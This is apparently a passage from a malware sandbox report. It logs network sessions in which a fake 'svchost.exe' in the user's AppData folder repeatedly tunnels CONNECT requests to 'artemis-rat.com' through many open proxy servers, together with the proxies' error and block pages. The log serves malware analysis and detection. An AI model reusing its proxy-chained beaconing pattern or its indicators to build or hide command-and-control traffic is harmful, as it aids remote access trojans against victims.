Mar 9, 2024 13:14:34.194752932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.645592928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.146222115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.942857027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.442869902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.850475073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3154	192.168.2.5	60070	89.168.121.175	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.195260048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3155	192.168.2.5	58320	174.77.111.196	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.208241940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3156	192.168.2.5	60132	3.97.176.251	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.231097937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.460315943 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:34 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3157	192.168.2.5	60076	122.51.123.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.231122971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3158	192.168.2.5	60151	94.131.64.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.279259920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.500094891 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3661 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:58378 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3159	192.168.2.5	60101	212.118.43.143	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.279264927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.617870092 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3160	192.168.2.5	60124	133.18.234.13	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.279704094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.588430882 CET	113	IN	HTTP/1.1 503 Service Temporarily Unavailable Content-Type: text/html Connection: close Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 Data Ascii: Backend not available

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3161	192.168.2.5	60152	142.54.232.6	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.281332970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3162	192.168.2.5	60093	39.99.144.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.283647060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.615431070 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3163	192.168.2.5	60108	8.219.97.248	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.284251928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3164	192.168.2.5	59875	103.197.71.7	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.284799099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3165	192.168.2.5	59856	82.223.121.72	63596	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.289340973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366213083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3166	192.168.2.5	58542	185.8.67.90	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.296370983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3167	192.168.2.5	58571	129.126.65.78	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.306837082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3168	192.168.2.5	60141	119.28.60.64	8090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.311764956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3169	192.168.2.5	60120	202.150.1.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.318578959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3170	192.168.2.5	60125	8.219.179.237	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.322801113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3171	192.168.2.5	58495	148.72.209.174	64938	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.323431015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.677234888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3172	192.168.2.5	60237	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.325328112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3173	192.168.2.5	60246	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.326674938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3174	192.168.2.5	60253	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.327385902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3175	192.168.2.5	60264	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.328517914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3176	192.168.2.5	60123	103.231.78.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.338134050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3177	192.168.2.5	60145	47.106.76.196	8088	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.346566916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.145929098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.488663912 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3178	192.168.2.5	60160	172.67.3.108	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
